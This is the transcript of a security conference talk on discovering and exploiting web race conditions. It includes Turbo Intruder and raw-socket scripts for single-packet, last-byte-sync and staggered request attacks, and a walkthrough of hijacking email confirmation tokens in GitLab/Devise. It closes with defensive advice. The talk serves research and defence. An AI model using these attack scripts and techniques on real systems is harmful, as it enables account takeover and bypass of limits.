Thank you. Thanks for coming, I know it's an early start. Good morning and welcome to Smashing the State Machine: the true potential of web race conditions.

Have you ever seen a vulnerability that made absolutely no sense? Something that didn't just leave you wondering "why would anyone code that?", but asking "how is it even possible to write code that has that effect?" Maybe you even got hold of the code and stared at it for hours, and it still made no sense. And perhaps if you showed it to somebody else, they'd say something like, "oh, it must be a race condition". In this session, I'm going to share with you tools and techniques to discover and exploit that kind of race condition.

Let's start by surveying what we do understand: what race conditions have you seen or exploited in the wild? Maybe things like reusing a single-use voucher multiple times, bypassing some kind of rate limit, or reviewing a single product multiple times. One of my favorites that I found was that you could reuse a valid reCAPTCHA solution multiple times within a short time window. When I reported that to Google, they said, "yeah, that's not good, but unfortunately our system is so distributed that we can't patch this". So that technique still works on a bunch of websites today.

But all of these examples could be classed as limit overruns: they're all about doing something more times than you're supposed to. If you go digging through every post you can find on this topic, you'll land on one called Race Conditions on the Web by Josip Franjković. In that post he describes four vulnerabilities. Three of them are regular limit overruns, and one of them is different. The vulnerability he found took two months just for him and Facebook's security team to figure out how to replicate. The issue was that sometimes, when changing your email, Facebook would put two confirmation codes for two different addresses, using two different parameter names, in a single email. Now, I had no idea what was happening there, and I don't think they did either. But one thing was clear: this wasn't a limit overrun vulnerability.

So last September, six years after I first read that blog post, I decided to try to figure out what happened, and I gradually came to realize that the race condition attacks we all know and love are just toy vulnerabilities compared with what else is out there. In this session, I'm going to show you the true potential of this attack class, tools and techniques to achieve that potential, and case studies plus a live demo to show some of the insanity that's out there waiting for you to discover. After that, I'll share where things can be taken further, how to prevent these attacks, and the key takeaways, leaving five minutes for questions. On certain slides you'll see a mortarboard icon. That just means I've built a free online replica of that vulnerability and published it in the Web Security Academy, so you can practice exploiting it on a live system for yourself.

Now, to communicate the true potential of this attack class, I'm going to use a multi-step vulnerability that I discovered by accident a while back. I noticed that when I logged into this website, it asked me to select a role before proceeding to the application. So I thought: okay, if I visualize the state machine for the user's role, it looks something like this.
And well, maybe we can just jump from the role selection page to the back end without choosing a role and get some kind of privilege escalation going. I tried that, and it didn't work, and I thought, well, I guess it's secure then. I mean, look at that diagram. It looks pretty secure, right?

But the diagram was actually wrong. It's missing a state, because it's not zoomed in enough: it assumes that the GET request to the role selection page doesn't change the application state. As it happened, for reasons I don't entirely understand, the application was creating every session with administrative privileges, and the GET request was then revoking those privileges. So by failing to zoom in, I almost missed quite a serious vulnerability.

But that's just my bad, right? Because everyone knows that multi-step sequences are a wonderful source of all kinds of serious vulnerabilities, so it's essential to always zoom in as much as possible and test every possible permutation of a process like this. Researching race conditions, though, I found myself looking back at this finding and thinking: is that the furthest we can zoom in, or can we go further still? What if the application had dropped our privileges immediately, using a second database statement? There would still be a roughly one-millisecond window where every session had administrator privileges, but I would never have discovered it. And that's a slightly scary thought, because any login form could have that vulnerability; it doesn't need to be a multi-step login. Worse than that, it shows that any HTTP request might be transitioning the application through invisible, vulnerable sub-states like that one, and these could potentially lead to some serious attacks. In other words, we all know that multi-step sequences are really dangerous, and with race conditions, everything is potentially multi-step. That is the true potential of web race conditions, and now it's time to start hacking some stuff.

To discover a sub-state, we need a collision. That means we need two requests: one to trigger the sub-state, or the race window, and another that accesses the same resource at the same time. In the example we just saw, that might mean trying to log in and access the admin panel simultaneously. However, there's a major barrier to making this happen, one that has plagued this attack class pretty much ever since it was invented: network jitter, which delays our requests inconsistently, meaning the race windows don't line up and the vulnerabilities don't get discovered.

To solve this problem, I've developed the single-packet attack, which makes 20 to 30 HTTP requests arrive at the server simultaneously, regardless of how bad the network jitter is on your connection. Under the hood, this technique is all about TCP and HTTP. The previously best-known technique was called last-byte synchronization. It takes advantage of the fact that web servers generally won't start to process a request until the whole request has arrived. With last-byte sync, you withhold the final byte of each request, which makes the final packet of each request nice and small, and makes the jitter not quite so bad. But it only goes so far.
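To make last-byte sync concrete, here's a minimal sketch over raw sockets. The hostname, path, body, and connection count are all hypothetical, and a real implementation would need error handling, but the two-phase structure is the essence of the technique.

```python
import socket
import ssl

HOST = "race-target.example"  # hypothetical target
REQ = ("POST /gift-card/redeem HTTP/1.1\r\n"
       f"Host: {HOST}\r\n"
       "Content-Length: 18\r\n"
       "\r\n"
       "code=FREE-VOUCHER1")

def open_conn():
    ctx = ssl.create_default_context()
    sock = socket.create_connection((HOST, 443))
    # Disable Nagle's algorithm so the tiny final packets aren't coalesced.
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    return ctx.wrap_socket(sock, server_hostname=HOST)

# Phase 1: send every request minus its final byte. The server buffers each
# incomplete request and won't start processing any of them yet.
conns = [open_conn() for _ in range(10)]
for c in conns:
    c.sendall(REQ[:-1].encode())

# Phase 2: release the withheld bytes back-to-back. Each final packet is a
# single byte, so the jitter between them is small, but still nonzero.
for c in conns:
    c.sendall(REQ[-1:].encode())
```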
A couple of years back, though, I read an academic white paper called Timeless Timing Attacks, and in it they noticed that with HTTP/2 you can actually stuff two entire requests into a single TCP packet. They used that for timing attacks, which was pretty cool, but I was wondering: can we adapt this and use it for race conditions? There's really only one barrier, which is that to find a race condition reliably, thanks to factors like server-side jitter, we need more than two requests. So what I did was take these two techniques and smush them together to create the single-packet attack, which completes 20 to 30 requests in a single packet, eliminating network jitter. And I've just released this in an update to the open-source tool Turbo Intruder.

Now, this technique is frankly pretty obvious, and I thought: this is so obvious, I wonder if anyone else has already done it. I googled, and it turns out someone implemented something quite similar for a master's project back in 2020, but nobody noticed.

So why am I so excited about this technique? Well, because it isn't just some cool implementation trick. After refining it over months of research, it now works on all major web servers, and I can still fit the entire algorithm on a single slide. Ultimately, it brings insane performance in a parcel that's so easy to implement, I think it will end up in all major web testing tools. The reason it's so easy to implement is that, thanks to some creative abuse of Nagle's algorithm, which is in every operating system's network stack, you don't need to code a custom TCP or TLS stack. You can just take an HTTP/2 library and bolt this feature onto the side. If you're tempted to make your own version, I'd say go for it, and I think Golang's HTTP/2 stack is probably one of the easiest to extend in that manner. I'm really looking forward to seeing where other people take this technique in the future, because it can definitely be developed further.

But of course, the thing I'm most excited about is the performance. To benchmark this technique, I repeatedly sent a batch of 20 requests from Melbourne to Dublin, and I measured the gap between the execution timestamps of the first and last requests to reach the server in each batch; in other words, how close together the whole batch landed. Using last-byte sync, I saw a median spread of four milliseconds and a standard deviation of three, which is honestly not that bad, better than I expected. I think that's because I had data centers at both ends of this benchmark; if you were using Australian consumer broadband, you might have a different experience. Then I retried it with the single-packet attack and saw a median spread of one millisecond and a standard deviation of 0.3. In other words, the majority of these 20 requests, traveling 17,000 kilometers, were getting executed in the same millisecond on the target server.

In terms of what that means in practice, you could say it makes this technique 4 to 10 times more effective than last-byte sync. Or, on one real vulnerability that I found, I was able to replicate the issue within 30 seconds using the single-packet attack, whereas it took over two hours of automated attempts to replicate the same issue using last-byte sync. If you want to summarize this in a little sound bite, I would say: by eliminating network jitter, the single-packet attack makes remote race conditions local.
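In Turbo Intruder, the core of a single-packet attack looks something like the following, closely based on the example scripts shipped with the tool. Requests queued behind a gate are withheld, and opening the gate releases them together; Engine.BURP2 selects the HTTP/2-based engine that supports the single-packet attack.

```python
def queueRequests(target, wordlists):
    # The HTTP/2 engine is required for the single-packet attack.
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    # Queue 20 copies of the attack request; nothing is sent until the gate opens.
    for i in range(20):
        engine.queue(target.req, gate='race1')
    # Open the gate: the withheld requests go out together in a single packet.
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)
```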
Now that we've solved network jitter, it's time to go hunting for some bugs. Limit overrun vulnerabilities are easy to find: you look for a limit, and you try to overrun it. Going beyond that, things get a bit trickier, and after months of manual testing and discovering every possible pitfall, I've developed the following three-stage methodology to find these bugs reasonably efficiently. First, you predict where you might have potential collisions. Then you probe those places to identify clues that there's a sub-state there. And finally, you prove the concept by figuring out what happened and using that knowledge to build an exploit.

Prediction is just about efficiency. In theory, because everything is multi-step, every single request is an arbitrarily complex multi-step process, so we ought to test every possible combination of endpoints on the entire website, plus any other websites that share the same back end. But that's not very practical. So instead, we're going to home in on places likely to have collisions with serious consequences. After doing that, we can further rule out endpoints that don't have much collision potential. For example, two threads editing a single piece of data at the same time could be quite interesting, whereas two threads merely appending to the same piece of data is less likely to have an interesting outcome. Similarly, you can ask: are these requests going to be editing the same record in the database? If the password reset system stores tokens in the users table, then doing two resets for two different users at the same time edits two different rows of that table, and you're not going to get a collision. Meanwhile, if the password reset system SMSes you a PIN and stores that PIN in your session, you can use your single session to do resets for two users, cause a collision, and maybe something interesting will happen.

Once you've built your requests, it's time to take them and probe for clues. The essential thing here is that it's quite easy to fail to recognize a clue. So the first step is to benchmark the normal behavior of the application by sending your requests one at a time, with a delay between each, so you don't trigger any races. Then you resend them all at once using the single-packet attack and look for anomalies: any deviation from the behavior you saw during the baseline (a minimal response-diffing helper is sketched after this section). If you don't see any, it might mean the endpoints are secure, or it might just mean you need to tune your attack timing, which I'll talk more about in a case study later on.

Finally, by this point we should have found an anomaly, so all you need to do, which is often the hardest part, is actually understand what happened, clean it up, replicate the behavior, and explore the impact. Now, a word of warning here. Exploring the impact might sound obvious, but if you're doing this methodology right and being ambitious with it, you're going to run into some quite weird and unfamiliar behavior, and as a result the path to maximum impact may be quite hard to find. So I would suggest thinking of the behavior you've found as a structural weakness, and looking throughout the application for security-relevant features that rely on that structure. Also, don't just stop and report the first exploit you find. I actually made that mistake myself and lost out on around $5,000 of bug bounty as a result.
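To make the probe step concrete, here's a hedged sketch of baseline-versus-race response diffing. The fingerprint function and the response shape are my own simplification, not part of any tool; a real fingerprint might also normalize timestamps and CSRF tokens out of the body.

```python
def fingerprint(resp):
    # Status code plus body length is a crude but useful response signature.
    return (resp.status_code, len(resp.content))

def find_anomalies(baseline_resps, race_resps):
    # Flag any race response whose shape never appeared during the baseline.
    expected = {fingerprint(r) for r in baseline_resps}
    return [r for r in race_resps if fingerprint(r) not in expected]
```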
So now we're going to take a look at a tiny slice of what you might find if you apply this approach in the wild. GitLab lets you invite unregistered users to administer projects via their email address, and I thought: okay, sounds juicy, I'll test it.

As a baseline, I just invited one address six times. This created one invitation, one invitation email, and six responses saying "success". When I re-sent these requests in one packet, we got one success, five error messages, and two emails. So we've got two clues that we've hit a race condition here. The first clue is that two emails from six requests is obviously quite suspicious. The other is that the responses we got differed from the baseline. Note that if we hadn't done the baseline and had just looked at those responses, we probably wouldn't have spotted that second clue.

Using that race, I was able to create multiple invitations with the same email address, which at first I thought was nice but kind of useless. But then I noticed that the page on GitLab listing pending invitations only displays one invitation per email address, because it doesn't think multiple ones can exist. So you can make a kind of low-privileged invitation, and if an admin sees it and deletes it, the page says "user was successfully removed from project" while a higher-level invitation survives behind the scenes. Now, that impact isn't amazing, because you need quite high privileges to exploit it in the first place, but it got my attention focused on GitLab. And it left me wondering whether there was another, more deliberate angle that would achieve a more serious impact.

One approach to finding inspiration for these kinds of race conditions is to look at classic multi-step exploits and see if you can find a race condition adaptation. For example, there's a classic exploit where you add an extra product to your basket somewhere in the payment validation process, after taking it to checkout, and if you time it right, you can get the extra product for free. I noticed that if you draw the state machine for GitLab's email verification process, it looks kind of similar. So maybe if we change our email address while GitLab is validating our previous email address, it will end up validating the wrong one. That would be high impact, because it would let me hijack administrator invitations intended for other users.

So I tried probing for this and didn't get any clues or anomalies, but I noticed that the email change response was arriving after the confirmation response every single time, presumably because changing email was a slower operation. So it was possible there was a race condition present and I just wasn't lining the requests up correctly. After some trial and error, I was able to fix this by sending the confirmation request 90 milliseconds after the email change. That approach did work on GitLab, but it's not ideal, because it rules out the single-packet attack. And I later discovered an alternative approach that I think is better. Web servers often delay requests that are sent too quickly, and we can take advantage of that by sending a single packet which contains, first, the slow-processing request, followed by a load of dummy requests that trigger the right amount of server-side delay, and finally the fast-processing request at the end. Using that technique, you can do a kind of staggered attack, and because the delay is implemented for you server-side, network jitter isn't going to make it fail.
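Here's a hedged sketch of that staggered attack in the same Turbo Intruder style as before. The request strings emailChangeReq, dummyReq, and confirmReq are hypothetical placeholders you'd build for your target, and the dummy count is something you'd tune by experiment.

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    # The slow-processing request goes first...
    engine.queue(emailChangeReq, gate='race1')
    # ...then dummy requests whose server-side processing supplies the delay...
    for i in range(5):
        engine.queue(dummyReq, gate='race1')
    # ...and the fast-processing request lands last, inside the race window.
    engine.queue(confirmReq, gate='race1')
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)
```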
Lining the race window up like this on GitLab revealed a massive clue: sometimes the email confirmation token was sent to the wrong address. Unfortunately for me, although this looked really exciting, the misdirected code was only ever valid for confirming the already-confirmed address, and was therefore useless. But it showed there's at least one sub-state hidden inside GitLab's email change endpoint, and so it's worth digging further into that functionality. And I'm going to do that by means of a live demo, on a remote server hosted in Ireland, over the conference Wi-Fi.

Cool. So here we have GitLab, and I'm just going to show that if I change my email address, the new one I entered has just been set as pending, because I have to click the confirmation link to prove that I own this email. So that's what we're going to be targeting. Let's see how it goes. I did test this earlier; it's not 100% reliable. Okay, on this Wi-Fi it was. I mean, it's never really 100% reliable, to be honest.

Okay. So first I'm going to probe for clues. I'm going to try to change my email to six different email addresses in the same millisecond using the single-packet attack, and I'm going to get all of these emails. They're all going to me, but every email address is unique. So I'm going to send this. The responses should arrive all at once. Yeah. Good.

The first tiny hint that something interesting might be happening is in this X-Runtime header: we can see the server processed this request in 350 milliseconds. For something that we know is sending an email, that's quite fast. It's almost like they're passing some data to a background thread, and the background thread is sending the email. And as soon as you've got data being passed between different threads, race conditions become a lot more likely. So that's a nice little hint, but it's definitely not evidence that there's a vulnerability there, right?

For evidence, I'm going to check my inbox and we'll see what we have. Okay, so we've got our eight confirmation emails, and if I scroll through these... right, there we go. So here, this one was sent to demo4@portswigger.net, but it's intended to confirm demo6. So this is our clue: it's been sent to the wrong address. But it's not a vulnerability, because this link isn't actually going to work. It will just say the confirmation token is invalid, because that confirmation token has been overwritten by one of the ones that came after it, and for some other reasons too.

So we've completed the probe phase, and now we're going to prove the vulnerability by switching to the exploit. This is where things get a little bit less reliable. I'm just sending two requests in a single packet. One sets an email address that goes to my inbox, and the other sets spoofed@localhost, which is obviously not supposed to go to my inbox. And there's just one other thing to mention: this little line here. In order for the misdirected confirmation token ever to be valid, you have to trigger GitLab's resend-token functionality, which you can do by changing your email address to the same value twice in a row. If you don't do that, the token is never valid, and it took me around two months to discover that. So I'm going to run this, and if we're really lucky, we'll get a misdirected token. And if we're even luckier, the token will actually work. Okay, that looks kind of promising: this is intended to go to spoofed@localhost, and it went to me.
The killer question is: is the link going to work? It does, first time. I should have pretended it was always going to work first time. Cool.

So yeah, that was that. I originally found that vulnerability on gitlab.com, and I could not resist obtaining the email address albinowax@gitlab.com. You can view that email address on my profile if you go there. But that shiny finding left me wondering what the code looked like. The vulnerable code starts out in a Ruby on Rails authentication library called Devise, and the problem is an inconsistency between how the system decides where to send the email and what to put inside it. The email is sent to an address stored in an instance variable, which is passed directly to the thread that sends the message. Meanwhile, the body of the email is populated by a server-side template engine using data fetched from the database. That means the data in the database can change in the meantime, leading to this discrepancy (a simplified analogue of this pattern is sketched after this section).

And the impact is quite significant. As I mentioned, you can use this to hijack pending invitations intended for other people and just gain administrative access to random projects. But GitLab can also be used as an OpenID provider by third-party websites to create a "Sign in with GitLab" button, and depending on how the third-party website does that integration, this can enable a load of follow-up attacks against that third party, all the way up to arbitrary account hijacking if you're lucky. If you were to find this bug in a major OpenID provider, it would be a pretty big deal.

Now, I reported this to GitLab and they patched it pretty fast. Then I reported it to Devise, and things did not go so well. Over the span of 200 days, I reported it to over four addresses and received no reply until last week. There's no patch available yet, but at least they've replied, so maybe there'll be a patch in the future.

So I went hunting for other bug bounty sites using this library, and as it turns out, it's really popular: loads of Rails-based sites use it. It's really easy to fingerprint, because it registers an unauthenticated endpoint, /users/confirmation, that you can just spot. And because of the way the library is written, every website integrates with it slightly differently, so every exploitation journey is slightly different, which makes it great practice and good fun. A couple of highlights I encountered during this process: some sites had visible locking, meaning they were obviously only processing one email change at a time, so they were secure. On another site, the confirmation email they generated didn't tell you which address it was supposed to confirm, so there were no hints that the vulnerability was present, and it was really unreliable on that site. I had to write a script that would do the attack, receive the email, parse it, click the link, and reload my profile to work out which email address had actually been confirmed, and then I had to run it for 14 hours to actually compromise another email. On a couple of other targets, the visible email change functionality was secure against this attack, but Devise registers a separate hidden endpoint for triggering an email resend, and that was still vulnerable.
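Going back to the root cause for a moment, here's a hedged Python analogue of the Devise pattern described above. It is not Devise's actual Ruby code; the names and the delay are invented to show the mismatch between the snapshotted recipient and the freshly rendered body.

```python
import threading
import time

db = {"unconfirmed_email": None}  # stand-in for the user row

def change_email(new_addr):
    db["unconfirmed_email"] = new_addr
    # The recipient is a snapshot (the "instance variable") handed straight
    # to the background thread that sends the message.
    threading.Thread(target=send_confirmation, args=(new_addr,)).start()

def send_confirmation(recipient):
    time.sleep(0.05)  # simulated render/queue delay: the race window
    # The body is rendered from *current* database state, so a second change
    # landing inside the window misdirects the other address's token.
    body = f"Click here to confirm {db['unconfirmed_email']}"
    print(f"to={recipient}: {body}")

change_email("attacker@evil.example")  # hypothetical addresses
change_email("victim@example.com")     # lands inside the first window
time.sleep(0.2)  # let the mail threads finish
```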
Now, with that, let's move on from GitLab and Devise. Race conditions are weird, and I've saved the weirdest one for last. This was another token-misrouting flaw, but the two requests that triggered it could be sent with a 20-minute delay between them. You might be thinking that doesn't look like a race condition, but it was really unreliable, so chances are it was. After some analysis, what I think was happening is that my email change requests were getting put on a queue, which was then being processed by a multi-threaded batch job once every 30 minutes or so. So the timing of my requests was practically irrelevant, and the vulnerability was triggered by my request volume rather than my timing. The only reason I discovered it is that I noticed two emails being sent to the same address. Over the course of this research, thanks to things like this, I've come to regard spotting anomalies like that as the single most important skill for finding race conditions, especially deferred ones like this, where the response the application sends to your actual request is never going to tell you a vulnerability is present, because the vulnerability hasn't even been triggered yet.

Now, I focused on email-based attacks during my research, but where else can you find these things? Well, basically everywhere, but one pattern you may well encounter is partial construction attacks. These occur when an object is created in multiple steps, creating an insecure middle state, like you can see in the code snippet here, where this token variable is briefly not set. I didn't use this one as a case study because I actually wrote this code myself, about ten years ago, and it was not supposed to be vulnerable. This type of attack is most likely to work on platforms that support default or null-type values and don't just throw exceptions when they encounter them, so think PHP and MySQL, but that's not a strict requirement. And for a completely different type of partial construction attack, check out the linked vulnerability found by Natalie Silvanovich in Google's WebRTC implementation in Duo.
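The snippet from the slide isn't reproduced in this transcript, so here's a minimal Python reconstruction of the pattern being described; the password-reset framing and all the names are illustrative assumptions.

```python
import secrets

resets = {}  # in-memory stand-in for a password-reset table

def create_reset(user_id):
    # Step 1: the record is persisted before its secret exists. This is the
    # insecure middle state, where the token is briefly not set.
    resets[user_id] = {"token": None}
    # Step 2: the race window only closes once the token is written.
    resets[user_id]["token"] = secrets.token_hex(16)

def redeem_reset(user_id, token):
    record = resets.get(user_id)
    # On platforms that coerce missing parameters to null/default values
    # instead of raising, a request arriving inside the window can supply
    # an empty token and match the half-built record.
    return record is not None and record["token"] == token
```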
Now, another angle for further research is exploring the root cause of race conditions from the ground up, which is unsafe combinations of data structures and locking strategies. There are three main strategies you'll run into.

The classic defense is locking. For example, PHP's default session handler only processes one request at a time in a given session. That means two things: firstly, they're not going to have a session-based race condition, but also, if you try to trigger a database-layer race condition using a single session, you'll fail to find it every time. So it's important to recognize this behavior and work around it by doing things like using multiple sessions.

Probably the most common approach you'll see in session handlers and ORMs is batching. This is where they read the entire session, let's say from the database, into a local in-memory copy; any reads and writes the application does during that request are applied to that local copy, and the whole copy is written back to the database at the end of the request lifecycle. This makes the values internally consistent during that request lifecycle, but as we saw with Devise, as soon as data gets passed to a background thread, you're outside the scope of that protection and everything falls apart. Also, if you have two requests operating on the same record simultaneously, generally one will end up overwriting the database changes from the other.

Finally, if there's no defense present, all bets are off. You see that most commonly with databases where people aren't making adequate use of transactions, but you also see it occasionally with custom session handlers. If you find a session handler with that property, one that's not doing batching or locking, it needs some really heavy testing, because there's a whole load of completely plausible, reasonable code patterns that suddenly have critical vulnerabilities when they're built on top of a vulnerable session handler. I would say it's almost impossible to write secure code at the application layer when you're building on top of a session handler that's not doing some kind of synchronization or batching.

Now, the final area for research is improving the single-packet attack. My implementation lets you get about 20 to 30 requests into one packet; if you queue more than that, the operating system just puts them in another packet shortly afterwards. I'm certain you can fit a lot more requests into a single packet with enough effort. You can definitely do it with a custom TCP or TLS stack, and there may be other, easier ways of making it happen that I didn't think of. I didn't try to push that side of the research that far, because 20 requests is enough to cause a lot of damage in the wild by itself. The other thing that would be really valuable on that angle is other ways of causing server-side delays, because that would let you trigger staggered attacks more reliably, and it would also help out a little with the timing-attack side as well. More generic techniques would be especially valuable there.

Now, one final word of advice. This is a slide just for DEF CON, and it might be a controversial take; we'll see. In this session I've tried to squeeze six months of research into the space of 40 minutes, and one thing that can get lost in that condensing process is how big the gap can get between exploiting something and actually understanding it. For example, with that GitLab vulnerability, I exploited gitlab.com successfully in, I can't remember, maybe two days. Whereas when I built my own local replica for the live demo, I could get the token to be misrouted, but the token was never, ever valid. I ran attacks every ten seconds for weeks and it was never valid, and it took me over two months to figure out why that was happening and gain the understanding to actually replicate it successfully. Similarly, I've mentioned that timing information can be really valuable, but front ends can do all kinds of different things with your requests, which can cause other timing delays and massive timing red herrings. Now, you can recognize that behavior and work around it, but what I'm getting at is that with this bug class, you will encounter things that don't make sense, and that's absolutely fine. My advice is just to embrace the chaos. Normally I would say you should understand a system and then use that understanding to exploit it, but with race conditions, there's a risk that limits you to finding vulnerabilities that make sense, and in my experience the coolest race conditions make the least sense. In other words, it's nice to have an explanation, but all you really need is an exploit.

Now, for defense. When a single request can push an application through multiple invisible sub-states, understanding that application and predicting its behavior is incredibly difficult, and defense is just not practical. So my advice is to try to eliminate sub-states entirely: the effects of each request should be atomic, and you can generally achieve that using your datastore's consistency features.
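As a minimal illustration of that advice, here's a sketch using sqlite3 from Python's standard library; the voucher table and codes are hypothetical. The check and the update happen in one atomic statement, so two concurrent redeems can't both observe an unused voucher.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE vouchers (code TEXT PRIMARY KEY, used INTEGER)")
conn.execute("INSERT INTO vouchers VALUES ('FREE-VOUCHER1', 0)")

def redeem(code):
    # The WHERE clause makes check-and-update a single atomic operation,
    # unlike a separate SELECT followed by an UPDATE, which opens a race
    # window between the read and the write.
    cur = conn.execute(
        "UPDATE vouchers SET used = 1 WHERE code = ? AND used = 0", (code,))
    conn.commit()
    return cur.rowcount == 1

print(redeem("FREE-VOUCHER1"))  # True: the first redeem wins
print(redeem("FREE-VOUCHER1"))  # False: the limit can't be overrun
```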
Another thing that will help with that is avoiding mixed data sources. Devise was vulnerable because it sent an email to an address from an instance variable but took the contents from the database; if it had taken both the email address and the contents from the database, it would have been absolutely fine. The other key thing is to make sure you know what kind of locking system your session handler is using, because if it's not doing any locking, that's bad news.

Now, there's a lot of further reading available. The three key things I would suggest: check out the white paper, which is basically the written-up version of this presentation, with a little bit of extra info and some different angles; have a practice on our online labs, because there's no substitute for real experience with these vulnerabilities; and finally, grab my code, take the single-packet attack, and find some real vulnerabilities out in the wild. If you have any crazy findings with these techniques that you'd like to share, I'd absolutely love to hear all about it.

And the three key things to take away: the single-packet attack makes remote race conditions local; with race conditions, everything is potentially multi-step; and to find these bugs, predict, probe, and prove. I'm going to take five minutes of questions now. If you have any more after that, just come and chat to me at the back, or chuck me an email. Thank you for listening. Any questions? Yeah, can you use... there's a microphone over in the middle. Sorry, yep.

What severity did GitLab eventually rate that vulnerability as?

Sadly for me, GitLab rated it as medium, which I don't think is accurate. I think part of that was because when I initially reported it, I hadn't discovered the invitation hijacking angle; I didn't realize that getting a validated email would actually let you do that, and by the time I realized, it was already fixed and paid out. So I think if I'd originally reported it with that impact, it would have got a high, whereas as it was, it was only risky to people using GitLab via the "Sign in with GitLab" button, which thankfully not many people are doing. Anyone else?

Thanks for the really interesting talk. You mentioned that front ends and load balancers cause issues with this sort of thing, and you said there are some workarounds. What are they?

They're not all trivial, but basically you have to observe what's happening. If you send your requests in a batch and you notice the first request always comes back faster, you can try changing the order of the requests, and sometimes by flipping the order you can fix the issue. Or just add a dummy request at the start; that's one way of dealing with it. But there are so many different things they can do that it's hard to give a playbook for every kind of scenario. I think the most important thing there is, when you see a delay, don't assume that it's something happening server-side; that could just be the load balancer. So test that assumption before you try to work around it.

Cool, I think that's everyone.